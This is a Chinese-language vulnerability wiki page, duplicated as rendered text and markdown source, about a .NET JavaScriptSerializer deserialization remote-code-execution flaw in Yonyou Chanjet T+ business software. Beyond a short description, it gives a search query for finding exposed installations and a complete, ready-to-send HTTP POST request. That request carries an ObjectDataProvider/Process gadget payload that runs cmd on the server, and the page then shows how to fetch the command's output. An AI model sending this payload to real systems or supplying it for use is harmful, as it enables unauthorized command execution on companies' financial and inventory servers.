fofamini-wiki

登录白背景

源码

用友畅捷通TPlus Ufida.T.DI.UIP .net反序列化漏洞

一、漏洞简介

畅捷通T+专属云适用于需要一体化管理的企业，财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该漏洞属于.net反序列化场景中的 JavaScriptSerializer反序列化。在.NET处理 Ajax应用的时候，通常序列化功能由JavaSerializer类提供，它是.NET2.0之后内部实现的序列化功能的类，位于命名空间System.Web…Serialization、通过System.Web.Extensions引用，让开发者轻松实现.Net中所有类型和Json数据之间的转换，但在某些场景下开发者使用Deserialize 或DeserializeObject方法处理不安全的Json数据时会造成反序列化攻击从而实现远程RCE漏洞。

二、影响版本

用友畅捷通TPlus

三、资产测绘

hunnterapp.name="畅捷通 T+"
登录页面

四、漏洞复现

POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
Content-Length: 601
Connection: close
Content-Type: application/json
Accept-Encoding: gzip, deflate, br

{
  "storeID": {
    "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "ObjectInstance": {
      "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName": "cmd",
        "Arguments": "/c echo baidubaidu > baidu.txt"
      }
    }
  }
}

获取命令执行结果

/tplus/baidu.txt

原文: https://www.yuque.com/xiaokp7/ocvun2/pbu1ggxd2gzeocgy

# 用友畅捷通TPlus Ufida.T.DI.UIP .net反序列化漏洞

# 一、漏洞简介
畅捷通T+专属云适用于需要一体化管理的企业，财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该漏洞属于.net反序列化场景中的 JavaScriptSerializer反序列化。在.NET处理 Ajax应用的时候，通常序列化功能由JavaSerializer类提供，它是.NET2.0之后内部实现的序列化功能的类，位于命名空间System.Web…Serialization、通过System.Web.Extensions引用，让开发者轻松实现.Net中所有类型和Json数据之间的转换，但在某些场景下开发者使用Deserialize 或DeserializeObject方法处理不安全的Json数据时会造成反序列化攻击从而实现远程RCE漏洞。

# 二、影响版本

- 用友畅捷通TPlus

# 三、资产测绘

- hunnter`app.name="畅捷通 T+"`
- 登录页面

![image.png](./img/ess4lrZwXzU8ayll/1693740551445-cd97f856-77f1-472d-b780-9a2a25ce0a26-964860.png)

# 四、漏洞复现
```java
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
Content-Length: 601
Connection: close
Content-Type: application/json
Accept-Encoding: gzip, deflate, br

{
  "storeID": {
    "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "ObjectInstance": {
      "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName": "cmd",
        "Arguments": "/c echo baidubaidu > baidu.txt"
      }
    }
  }
}
```
![image.png](./img/ess4lrZwXzU8ayll/1710471890523-f2bc5250-9544-4378-9ca0-fd32a782e3dc-082256.png)
获取命令执行结果
```java
/tplus/baidu.txt
```
![image.png](./img/ess4lrZwXzU8ayll/1710471914522-fcd8bad4-71fb-4db3-aab7-7d63f0efd56b-856730.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pbu1ggxd2gzeocgy>